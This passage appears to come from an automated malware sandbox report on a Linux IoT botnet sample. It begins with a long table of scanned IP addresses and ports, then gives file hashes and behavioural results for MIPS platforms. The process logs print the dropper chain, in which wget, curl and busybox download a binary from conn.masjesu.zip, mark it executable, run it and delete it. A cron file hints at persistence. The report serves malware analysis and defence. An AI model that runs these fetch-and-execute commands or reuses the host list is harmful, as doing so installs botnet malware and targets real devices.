| CN | 42.102.62.228:8080 | tcp | |
| ID | 36.79.170.74:8080 | tcp | |
| US | 69.1.2.158:8080 | tcp | |
| US | 35.63.29.147:8080 | tcp | |
| US | 12.153.80.135:8080 | tcp | |
| BR | 200.205.230.214:8080 | tcp | |
| EG | 45.105.207.10:8080 | tcp | |
| KW | 212.43.17.7:8080 | tcp | |
| CN | 222.26.210.56:8080 | tcp | |
| ID | 39.230.241.27:8080 | tcp | |
| US | 169.130.91.95:8080 | tcp | |
| CN | 123.197.194.234:8080 | tcp | |
| US | 3.82.152.41:52869 | tcp | |
| RU | 213.151.28.166:52869 | tcp | |
| JP | 126.76.48.179:52869 | tcp | |
| NL | 145.210.134.181:81 | tcp | |
| DK | 2.105.79.16:80 | tcp | |
| US | 18.7.155.165:37215 | tcp | |
| US | 8.80.179.141:52869 | tcp | |
| US | 17.10.187.166:52869 | tcp | |
| US | 40.123.110.153:52869 | tcp | |
| DE | 79.193.48.79:52869 | tcp | |
| BR | 177.18.194.254:52869 | tcp | |
| US | 64.65.229.66:52869 | tcp | |
| CN | 121.32.165.48:52869 | tcp | |
| US | 68.165.156.81:52869 | tcp | |
| US | 70.183.110.242:52869 | tcp | |
| FR | 62.68.65.208:52869 | tcp | |
| NL | 213.126.53.108:52869 | tcp | |
| US | 70.89.206.61:52869 | tcp | |
| US | 57.125.252.42:52869 | tcp | |
| US | 3.152.75.174:52869 | tcp | |
| IT | 80.19.154.252:52869 | tcp | |
| US | 168.229.122.63:52869 | tcp | |
| AU | 103.192.175.157:52869 | tcp | |
| GB | 109.180.133.68:52869 | tcp | |
| CN | 221.202.254.42:52869 | tcp | |
| CL | 191.117.233.63:52869 | tcp | |
| SG | 43.78.129.16:52869 | tcp | |
| US | 165.236.214.216:52869 | tcp | |
| CN | 1.82.128.50:52869 | tcp | |
| KR | 211.168.77.245:52869 | tcp | |
| US | 50.115.118.1:52869 | tcp | |
| US | 72.67.189.181:52869 | tcp | |
| CN | 14.148.116.187:52869 | tcp | |
| US | 206.203.220.17:52869 | tcp | |
| US | 44.112.254.128:52869 | tcp | |
| US | 35.63.29.147:52869 | tcp | |
| CN | 42.102.62.228:52869 | tcp | |
| US | 96.149.194.215:52869 | tcp | |
| ID | 36.79.170.74:52869 | tcp | |
| FR | 85.222.202.82:52869 | tcp | |
| CA | 142.82.93.247:52869 | tcp | |
| US | 69.79.129.120:52869 | tcp | |
| CN | 27.14.109.151:52869 | tcp | |
| US | 174.174.175.234:52869 | tcp | |
| US | 54.53.211.6:52869 | tcp | |
| US | 69.1.2.158:52869 | tcp | |
| TW | 120.104.147.95:52869 | tcp | |
| US | 18.3.191.68:52869 | tcp | |
| RU | 178.155.12.58:52869 | tcp | |
| US | 69.142.119.224:52869 | tcp | |
| HK | 156.225.167.158:52869 | tcp | |
| US | 54.25.27.65:52869 | tcp | |
| CN | 221.11.176.194:52869 | tcp | |
| AU | 203.1.240.63:52869 | tcp | |
| KR | 122.35.186.55:52869 | tcp | |
| US | 157.96.246.215:52869 | tcp | |
| AT | 156.58.155.150:52869 | tcp | |
| US | 157.223.143.141:52869 | tcp | |
| US | 169.228.15.150:52869 | tcp | |
| RU | 176.107.250.169:52869 | tcp | |
| US | 167.16.222.76:52869 | tcp | |
| TW | 180.218.146.162:52869 | tcp | |
| US | 208.189.30.14:52869 | tcp | |
| US | 162.102.138.228:52869 | tcp | |
| US | 75.137.123.129:52869 | tcp | |
| US | 66.102.216.222:52869 | tcp | |
| US | 17.247.199.124:52869 | tcp | |
| US | 76.52.64.217:52869 | tcp | |
| BR | 200.205.230.214:52869 | tcp | |
| EG | 45.105.207.10:52869 | tcp | |
| US | 12.153.80.135:52869 | tcp | |
| KW | 212.43.17.7:52869 | tcp | |
| CN | 123.197.194.234:52869 | tcp | |
| US | 169.130.91.95:52869 | tcp | |
| CN | 222.26.210.56:52869 | tcp | |
| ID | 39.230.241.27:52869 | tcp | |
| US | 32.102.69.60:52869 | tcp | |
| CN | 123.59.84.221:52869 | tcp | |
| US | 68.91.202.150:52869 | tcp | |
| US | 184.117.24.190:52869 | tcp | |
| US | 3.82.152.41:7574 | tcp | |
| RU | 213.151.28.166:7574 | tcp | |
| NL | 145.210.134.181:8080 | tcp | |
| JP | 126.76.48.179:7574 | tcp | |
| DK | 2.105.79.16:81 | tcp | |
| US | 18.7.155.165:80 | tcp | |
| BR | 177.18.194.254:7574 | tcp | |
| US | 68.165.156.81:7574 | tcp | |
| DE | 79.193.48.79:7574 | tcp | |
| US | 64.65.229.66:7574 | tcp | |
| US | 17.10.187.166:7574 | tcp | |
| NL | 213.126.53.108:7574 | tcp | |
| CN | 121.32.165.48:7574 | tcp | |
| FR | 62.68.65.208:7574 | tcp | |
| US | 70.183.110.242:7574 | tcp | |
| US | 70.89.206.61:7574 | tcp | |
| US | 40.123.110.153:7574 | tcp | |
| SG | 43.78.129.16:7574 | tcp | |
| US | 165.236.214.216:7574 | tcp | |
| US | 50.115.118.1:7574 | tcp | |
| CN | 1.82.128.50:7574 | tcp | |
| CA | 142.82.93.247:7574 | tcp | |
| US | 3.152.75.174:7574 | tcp | |
| CN | 221.202.254.42:7574 | tcp | |
| IT | 80.19.154.252:7574 | tcp | |
| CL | 191.117.233.63:7574 | tcp | |
| KR | 211.168.77.245:7574 | tcp | |
| GB | 109.180.133.68:7574 | tcp | |
| US | 69.79.129.120:7574 | tcp | |
| US | 57.125.252.42:7574 | tcp | |
| US | 96.149.194.215:7574 | tcp | |
| AU | 103.192.175.157:7574 | tcp | |
| US | 35.63.29.147:7574 | tcp | |
| US | 206.203.220.17:7574 | tcp | |
| US | 44.112.254.128:7574 | tcp | |
| US | 174.174.175.234:7574 | tcp | |
| CN | 42.102.62.228:7574 | tcp | |
| US | 168.229.122.63:7574 | tcp | |
| ID | 36.79.170.74:7574 | tcp | |
| FR | 85.222.202.82:7574 | tcp | |
| US | 72.67.189.181:7574 | tcp | |
| US | 54.53.211.6:7574 | tcp | |
| CN | 27.14.109.151:7574 | tcp | |
| CN | 14.148.116.187:7574 | tcp | |
| US | 32.102.69.60:7574 | tcp | |
| CN | 221.11.176.194:7574 | tcp | |
| US | 169.228.15.150:7574 | tcp | |
| AU | 203.1.240.63:7574 | tcp | |
| BR | 200.205.230.214:7574 | tcp | |
| US | 69.1.2.158:7574 | tcp | |
| US | 169.130.91.95:7574 | tcp | |
| US | 75.137.123.129:7574 | tcp | |
| US | 69.142.119.224:7574 | tcp | |
| US | 12.153.80.135:7574 | tcp | |
| US | 157.223.143.141:7574 | tcp | |
| US | 162.102.138.228:7574 | tcp | |
| TW | 180.218.146.162:7574 | tcp | |
| KW | 212.43.17.7:7574 | tcp | |
| US | 167.16.222.76:7574 | tcp | |
| RU | 176.107.250.169:7574 | tcp | |
| AT | 156.58.155.150:7574 | tcp | |
| US | 184.117.24.190:7574 | tcp | |
| ID | 39.230.241.27:7574 | tcp | |
| US | 68.91.202.150:7574 | tcp | |
| TW | 120.104.147.95:7574 | tcp | |
| KR | 122.35.186.55:7574 | tcp | |
| RU | 178.155.12.58:7574 | tcp | |
| CN | 123.59.84.221:7574 | tcp | |
| US | 17.247.199.124:7574 | tcp | |
| CN | 222.26.210.56:7574 | tcp | |
| US | 66.102.216.222:7574 | tcp | |
| RU | 213.151.28.166:5555 | tcp | |
| US | 3.82.152.41:5555 | tcp | |
| EG | 45.105.207.10:7574 | tcp | |
| CN | 123.197.194.234:7574 | tcp | |
| HK | 156.225.167.158:7574 | tcp | |
| US | 208.189.30.14:7574 | tcp | |
| US | 54.25.27.65:7574 | tcp | |
| US | 18.3.191.68:7574 | tcp | |
| US | 157.96.246.215:7574 | tcp | |
| US | 76.52.64.217:7574 | tcp | |
| US | 8.80.179.141:7574 | tcp | |
| JP | 126.76.48.179:5555 | tcp | |
| NL | 145.210.134.181:52869 | tcp | |
| DK | 2.105.79.16:8080 | tcp | |
| US | 18.7.155.165:81 | tcp | |
| RU | 213.151.28.166:49152 | tcp | |
| US | 70.183.110.242:5555 | tcp | |
| FR | 62.68.65.208:5555 | tcp | |
| NL | 213.126.53.108:5555 | tcp | |
| US | 40.123.110.153:5555 | tcp | |
| CN | 121.32.165.48:5555 | tcp | |
| US | 70.89.206.61:5555 | tcp | |
| BR | 177.18.194.254:5555 | tcp | |
| US | 68.165.156.81:5555 | tcp | |
| US | 17.10.187.166:5555 | tcp | |
| US | 64.65.229.66:5555 | tcp | |
| DE | 79.193.48.79:5555 | tcp | |
| US | 72.67.189.181:5555 | tcp | |
| US | 174.174.175.234:5555 | tcp | |
| CN | 221.202.254.42:5555 | tcp | |
| US | 3.152.75.174:5555 | tcp | |
| CN | 1.82.128.50:5555 | tcp | |
| CA | 142.82.93.247:5555 | tcp | |
| CL | 191.117.233.63:5555 | tcp | |
| ID | 36.79.170.74:5555 | tcp | |
| US | 35.63.29.147:5555 | tcp | |
| US | 168.229.122.63:5555 | tcp | |
| US | 206.203.220.17:5555 | tcp | |
| US | 54.53.211.6:5555 | tcp | |
| AU | 103.192.175.157:5555 | tcp | |
| FR | 85.222.202.82:5555 | tcp | |
| US | 96.149.194.215:5555 | tcp | |
| GB | 109.180.133.68:5555 | tcp | |
| US | 69.79.129.120:5555 | tcp | |
| US | 165.236.214.216:5555 | tcp | |
| US | 44.112.254.128:5555 | tcp | |
| US | 50.115.118.1:5555 | tcp | |
| CN | 14.148.116.187:5555 | tcp | |
| CN | 27.14.109.151:5555 | tcp | |
| IT | 80.19.154.252:5555 | tcp | |
| SG | 43.78.129.16:5555 | tcp | |
| KR | 211.168.77.245:5555 | tcp | |
| CN | 42.102.62.228:5555 | tcp | |
| US | 57.125.252.42:5555 | tcp | |
| US | 167.16.222.76:5555 | tcp | |
| EG | 45.105.207.10:5555 | tcp | |
| US | 69.1.2.158:5555 | tcp | |
| US | 32.102.69.60:5555 | tcp | |
| US | 75.137.123.129:5555 | tcp | |
| US | 157.223.143.141:5555 | tcp | |
| US | 208.189.30.14:5555 | tcp | |
| US | 169.228.15.150:5555 | tcp | |
| TW | 180.218.146.162:5555 | tcp | |
| RU | 176.107.250.169:5555 | tcp | |
| RU | 178.155.12.58:5555 | tcp | |
| HK | 156.225.167.158:5555 | tcp | |
| CN | 123.197.194.234:5555 | tcp | |
| US | 54.25.27.65:5555 | tcp | |
| AU | 203.1.240.63:5555 | tcp | |
| US | 66.102.216.222:5555 | tcp | |
| CN | 221.11.176.194:5555 | tcp | |
| BR | 200.205.230.214:5555 | tcp | |
| TW | 120.104.147.95:5555 | tcp | |
| US | 184.117.24.190:5555 | tcp | |
| AT | 156.58.155.150:5555 | tcp | |
| US | 17.247.199.124:5555 | tcp | |
| ID | 39.230.241.27:5555 | tcp | |
| US | 169.130.91.95:5555 | tcp | |
| US | 3.82.152.41:49152 | tcp | |
| US | 18.3.191.68:5555 | tcp | |
| US | 157.96.246.215:5555 | tcp | |
| US | 8.80.179.141:5555 | tcp | |
| US | 69.142.119.224:5555 | tcp | |
| US | 68.91.202.150:5555 | tcp | |
| US | 12.153.80.135:5555 | tcp | |
| KW | 212.43.17.7:5555 | tcp | |
| US | 162.102.138.228:5555 | tcp | |
| CN | 222.26.210.56:5555 | tcp | |
| CN | 123.59.84.221:5555 | tcp | |
| KR | 122.35.186.55:5555 | tcp | |
| US | 76.52.64.217:5555 | tcp | |
| NL | 145.210.134.181:7574 | tcp | |
| JP | 126.76.48.179:49152 | tcp | |
| DK | 2.105.79.16:52869 | tcp | |
| US | 18.7.155.165:8080 | tcp | |
| RU | 213.151.28.166:8443 | tcp | |
| US | 64.65.229.66:49152 | tcp | |
| DE | 79.193.48.79:49152 | tcp | |
| US | 17.10.187.166:49152 | tcp | |
| BR | 177.18.194.254:49152 | tcp | |
| US | 40.123.110.153:49152 | tcp | |
| US | 70.89.206.61:49152 | tcp | |
| CN | 121.32.165.48:49152 | tcp | |
| US | 68.165.156.81:49152 | tcp | |
| NL | 213.126.53.108:49152 | tcp | |
| FR | 62.68.65.208:49152 | tcp | |
| US | 70.183.110.242:49152 | tcp | |
| US | 44.112.254.128:49152 | tcp | |
| US | 96.149.194.215:49152 | tcp | |
| CN | 27.14.109.151:49152 | tcp | |
| FR | 85.222.202.82:49152 | tcp | |
| GB | 109.180.133.68:49152 | tcp | |
| US | 168.229.122.63:49152 | tcp | |
| CN | 14.148.116.187:49152 | tcp | |
| US | 69.79.129.120:49152 | tcp | |
| US | 35.63.29.147:49152 | tcp | |
| US | 165.236.214.216:49152 | tcp | |
| CL | 191.117.233.63:49152 | tcp | |
| CN | 221.202.254.42:49152 | tcp | |
| US | 174.174.175.234:49152 | tcp | |
| JP | 126.76.48.179:8443 | tcp | |
| NL | 145.210.134.181:5555 | tcp | |
| CN | 123.197.194.234:49152 | tcp | |
| RU | 176.107.250.169:49152 | tcp | |
| US | 169.228.15.150:49152 | tcp | |
| US | 167.16.222.76:49152 | tcp | |
| RU | 178.155.12.58:49152 | tcp | |
| US | 162.102.138.228:49152 | tcp | |
| US | 75.137.123.129:49152 | tcp | |
| US | 208.189.30.14:49152 | tcp | |
| HK | 156.225.167.158:49152 | tcp | |
| TW | 120.104.147.95:49152 | tcp | |
| BR | 200.205.230.214:49152 | tcp | |
| US | 3.82.152.41:8443 | tcp | |
| CN | 221.11.176.194:49152 | tcp | |
| TW | 180.218.146.162:49152 | tcp | |
| US | 54.25.27.65:49152 | tcp | |
| US | 68.91.202.150:49152 | tcp | |
| ID | 39.230.241.27:49152 | tcp | |
| CN | 222.26.210.56:49152 | tcp | |
| US | 76.52.64.217:49152 | tcp | |
| US | 169.130.91.95:49152 | tcp | |
| US | 12.153.80.135:49152 | tcp | |
| US | 8.80.179.141:49152 | tcp | |
| EG | 45.105.207.10:49152 | tcp | |
| US | 17.247.199.124:49152 | tcp | |
| US | 69.142.119.224:49152 | tcp | |
| US | 32.102.69.60:49152 | tcp | |
| US | 184.117.24.190:49152 | tcp | |
| AU | 203.1.240.63:49152 | tcp | |
| IT | 80.19.154.252:49152 | tcp | |
| KR | 211.168.77.245:49152 | tcp | |
| US | 206.203.220.17:49152 | tcp | |
| CN | 1.82.128.50:49152 | tcp | |
| US | 66.102.216.222:49152 | tcp | |
| CN | 42.102.62.228:49152 | tcp | |
| US | 69.1.2.158:49152 | tcp | |
| US | 18.3.191.68:49152 | tcp | |
| KR | 122.35.186.55:49152 | tcp | |
| US | 3.152.75.174:49152 | tcp | |
| US | 157.223.143.141:49152 | tcp | |
| US | 157.96.246.215:49152 | tcp | |
| CN | 123.59.84.221:49152 | tcp | |
| KW | 212.43.17.7:49152 | tcp | |
| ID | 36.79.170.74:49152 | tcp | |
| SG | 43.78.129.16:49152 | tcp | |
| AT | 156.58.155.150:49152 | tcp | |
| AU | 103.192.175.157:49152 | tcp | |
| US | 57.125.252.42:49152 | tcp | |
| US | 50.115.118.1:49152 | tcp | |
| US | 72.67.189.181:49152 | tcp | |
| US | 54.53.211.6:49152 | tcp | |
| CA | 142.82.93.247:49152 | tcp | |
| DK | 2.105.79.16:7574 | tcp | |
| US | 18.7.155.165:52869 | tcp | |
| IN | 171.59.82.186:37215 | tcp | |
| US | 70.89.206.61:8443 | tcp | |
| US | 17.10.187.166:8443 | tcp | |
| US | 64.65.229.66:8443 | tcp | |
| DE | 79.193.48.79:8443 | tcp | |
| BR | 177.18.194.254:8443 | tcp | |
| CN | 121.32.165.48:8443 | tcp | |
| US | 40.123.110.153:8443 | tcp | |
| NL | 213.126.53.108:8443 | tcp | |
| US | 68.165.156.81:8443 | tcp | |
| FR | 62.68.65.208:8443 | tcp | |
| US | 70.183.110.242:8443 | tcp | |
| CN | 14.148.116.187:8443 | tcp | |
| US | 35.63.29.147:8443 | tcp | |
| US | 69.79.129.120:8443 | tcp | |
| CL | 191.117.233.63:8443 | tcp | |
| US | 168.229.122.63:8443 | tcp | |
| FR | 85.222.202.82:8443 | tcp | |
| GB | 109.180.133.68:8443 | tcp | |
| US | 174.174.175.234:8443 | tcp | |
| US | 44.112.254.128:8443 | tcp | |
| CN | 27.14.109.151:8443 | tcp | |
| US | 165.236.214.216:8443 | tcp | |
| CN | 221.202.254.42:8443 | tcp | |
| US | 96.149.194.215:8443 | tcp | |
| US | 3.152.75.174:8443 | tcp | |
| CN | 123.197.194.234:8443 | tcp | |
| US | 169.228.15.150:8443 | tcp | |
| US | 76.52.64.217:8443 | tcp | |
| HK | 156.225.167.158:8443 | tcp | |
| US | 17.247.199.124:8443 | tcp | |
| US | 66.102.216.222:8443 | tcp | |
| US | 68.91.202.150:8443 | tcp | |
| AU | 203.1.240.63:8443 | tcp | |
| US | 18.3.191.68:8443 | tcp | |
| CN | 42.102.62.228:8443 | tcp | |
| RU | 178.155.12.58:8443 | tcp | |
| KR | 211.168.77.245:8443 | tcp | |
| BR | 200.205.230.214:8443 | tcp | |
| CN | 221.11.176.194:8443 | tcp | |
| US | 8.80.179.141:8443 | tcp | |
| CN | 222.26.210.56:8443 | tcp | |
| US | 167.16.222.76:8443 | tcp | |
| US | 184.117.24.190:8443 | tcp | |
| TW | 180.218.146.162:8443 | tcp | |
| US | 75.137.123.129:8443 | tcp | |
| KR | 122.35.186.55:8443 | tcp | |
| US | 208.189.30.14:8443 | tcp | |
| EG | 45.105.207.10:8443 | tcp | |
| US | 12.153.80.135:8443 | tcp | |
| CN | 1.82.128.50:8443 | tcp | |
| US | 162.102.138.228:8443 | tcp | |
| US | 69.1.2.158:8443 | tcp | |
| US | 69.142.119.224:8443 | tcp | |
| ID | 39.230.241.27:8443 | tcp | |
| US | 54.25.27.65:8443 | tcp | |
| NL | 145.210.134.181:49152 | tcp | |
| TW | 120.104.147.95:8443 | tcp | |
| US | 206.203.220.17:8443 | tcp | |
| US | 169.130.91.95:8443 | tcp | |
| US | 32.102.69.60:8443 | tcp | |
| US | 157.96.246.215:8443 | tcp | |
| US | 157.223.143.141:8443 | tcp | |
| RU | 176.107.250.169:8443 | tcp | |
| US | 57.125.252.42:8443 | tcp | |
| US | 72.215.250.178:37215 | tcp | |
| CN | 123.59.84.221:8443 | tcp | |
| US | 72.67.189.181:8443 | tcp | |
| ID | 36.79.170.74:8443 | tcp | |
| KR | 222.106.219.249:37215 | tcp | |
| US | 50.115.118.1:8443 | tcp | |
| SG | 43.78.129.16:8443 | tcp | |
| US | 54.53.211.6:8443 | tcp | |
| CA | 142.82.93.247:8443 | tcp | |
| KW | 212.43.17.7:8443 | tcp | |
| AT | 156.58.155.150:8443 | tcp | |
| AU | 103.192.175.157:8443 | tcp | |
| IT | 80.19.154.252:8443 | tcp | |
| DK | 2.105.79.16:5555 | tcp | |
| US | 18.7.155.165:7574 | tcp | |
| IN | 171.59.82.186:80 | tcp | |
| US | 108.122.217.15:37215 | tcp | |
| US | 161.6.151.73:37215 | tcp | |
| CH | 81.6.43.148:37215 | tcp | |
| US | 99.149.244.54:37215 | tcp | |
| US | 167.65.125.127:37215 | tcp | |
| IT | 5.98.119.62:37215 | tcp | |
| US | 19.191.169.151:37215 | tcp | |
| IT | 80.17.7.142:37215 | tcp | |
| JP | 36.12.152.179:37215 | tcp | |
| US | 15.97.191.187:37215 | tcp | |
| US | 35.85.168.78:37215 | tcp | |
| US | 108.122.217.15:80 | tcp | |
| AU | 101.164.220.178:37215 | tcp | |
| US | 97.74.148.73:37215 | tcp | |
| FR | 84.4.186.110:37215 | tcp | |
| FR | 79.91.200.213:37215 | tcp | |
| CN | 116.185.191.243:37215 | tcp | |
| KR | 221.141.222.201:37215 | tcp | |
| JP | 202.230.92.131:37215 | tcp | |
| US | 216.251.2.225:37215 | tcp | |
| GB | 195.99.7.153:37215 | tcp | |
| US | 151.119.189.144:37215 | tcp | |
| US | 44.136.35.34:37215 | tcp | |
| US | 157.215.158.220:37215 | tcp | |
| BR | 177.21.255.107:37215 | tcp | |
| US | 216.142.35.195:37215 | tcp | |
| US | 34.25.76.42:37215 | tcp | |
| US | 56.38.254.229:37215 | tcp | |
| CN | 111.35.191.236:37215 | tcp | |
| IT | 91.252.166.232:37215 | tcp | |
| KR | 211.172.79.180:37215 | tcp | |
| FR | 86.227.112.28:37215 | tcp | |
| US | 50.50.24.234:37215 | tcp | |
| KR | 202.20.176.124:37215 | tcp | |
| AU | 202.171.188.226:37215 | tcp | |
| AR | 181.8.238.90:37215 | tcp | |
| US | 48.214.185.167:37215 | tcp | |
| CN | 36.163.107.19:37215 | tcp | |
| US | 171.147.37.179:37215 | tcp | |
| US | 56.165.237.179:37215 | tcp | |
| US | 16.193.190.63:37215 | tcp | |
| US | 209.203.128.250:37215 | tcp | |
| US | 207.157.33.75:37215 | tcp | |
| IT | 62.196.30.19:37215 | tcp | |
| AE | 109.177.135.130:37215 | tcp | |
| KR | 222.106.219.249:80 | tcp | |
| US | 72.215.250.178:80 | tcp | |
| US | 169.93.187.199:37215 | tcp | |
| US | 75.35.37.107:37215 | tcp | |
| US | 9.251.180.91:37215 | tcp | |
| ZA | 41.181.35.41:37215 | tcp | |
| CN | 106.88.211.254:37215 | tcp | |
| FR | 90.32.220.230:37215 | tcp | |
| PH | 58.69.24.171:37215 | tcp | |
| CN | 117.133.109.118:37215 | tcp | |
| KR | 61.102.237.159:37215 | tcp | |
| CN | 110.97.243.82:37215 | tcp | |
| BR | 201.45.84.96:37215 | tcp | |
| US | 66.60.198.143:37215 | tcp | |
| CA | 173.34.247.236:37215 | tcp | |
| RO | 80.96.93.112:37215 | tcp | |
| CN | 111.25.25.49:37215 | tcp | |
| US | 9.171.43.74:37215 | tcp | |
| BR | 177.73.67.174:37215 | tcp | |
| ES | 194.106.18.151:37215 | tcp | |
| US | 170.23.110.239:37215 | tcp | |
| GB | 90.244.65.167:37215 | tcp | |
| US | 73.129.146.179:37215 | tcp | |
| MX | 201.172.165.165:37215 | tcp | |
| US | 16.90.226.20:37215 | tcp | |
| DK | 2.105.79.16:49152 | tcp | |
| US | 168.3.149.174:37215 | tcp | |
| NL | 145.210.134.181:8443 | tcp | |
| US | 48.73.202.179:37215 | tcp | |
| CN | 119.6.213.144:37215 | tcp | |
| CN | 157.156.177.163:37215 | tcp | |
| CZ | 90.180.75.74:37215 | tcp | |
| CN | 182.111.26.56:37215 | tcp | |
| US | 166.45.87.196:37215 | tcp | |
| US | 18.7.155.165:5555 | tcp | |
| IN | 171.59.82.186:81 | tcp | |
| US | 35.85.168.78:80 | tcp | |
| IT | 80.17.7.142:80 | tcp | |
| US | 161.6.151.73:80 | tcp | |
| JP | 36.12.152.179:80 | tcp | |
| US | 99.149.244.54:80 | tcp | |
| US | 15.97.191.187:80 | tcp | |
| US | 19.191.169.151:80 | tcp | |
| IT | 5.98.119.62:80 | tcp | |
| CH | 81.6.43.148:80 | tcp | |
| US | 167.65.125.127:80 | tcp | |
| US | 108.122.217.15:81 | tcp | |
| US | 168.3.149.174:80 | tcp |
Files
/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB
| MD5 | 786d75a158fe731feca3880f436082c0 |
| SHA1 | 79ea2734e43d00cdeabed5586b2c1994d02aef3e |
| SHA256 | 5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18 |
| SHA512 | 7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f |
/var/spool/cron/crontabs/tmp.nFADI4
| MD5 | 5e8eb0b39864e53b859bcdcaeb4dbe6a |
| SHA1 | c8116483ad132a21e500bb5087c53996ed66334c |
| SHA256 | 6f0768d965338cb7d3061fcc41810df84bd23d8978a6e186fe996b33e6ae37e7 |
| SHA512 | 4338d28aba1567ee8022a74e0d80020daaeea88b4d026c36fbb9e395e7e9d4a511073e94a018afe1863248585fe7f413d09ccff177f6b41c24ff829d746a0820 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-12-05 07:52
Reported
2024-12-05 07:54
Platform
debian9-mipsbe-20240611-en
Max time kernel
139s
Max time network
151s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | /usr/bin/wget | N/A |
| File opened for modification | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | /usr/bin/curl | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/bin/chmod
[chmod 777 zZM090BtLw96clc18K3325Bi3InWJUorwB]
/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB
[./zZM090BtLw96clc18K3325Bi3InWJUorwB]
/bin/rm
[rm zZM090BtLw96clc18K3325Bi3InWJUorwB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
Files
/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB
| MD5 | 786d75a158fe731feca3880f436082c0 |
| SHA1 | 79ea2734e43d00cdeabed5586b2c1994d02aef3e |
| SHA256 | 5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18 |
| SHA512 | 7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f |
Analysis: behavioral4
Detonation Overview
Submitted
2024-12-05 07:52
Reported
2024-12-05 07:54
Platform
debian9-mipsel-20240226-en
Max time kernel
149s
Max time network
9s
Command Line
Signatures
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB | /usr/bin/wget | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB
| MD5 | 786d75a158fe731feca3880f436082c0 |
| SHA1 | 79ea2734e43d00cdeabed5586b2c1994d02aef3e |
| SHA256 | 5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18 |
| SHA512 | 7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f |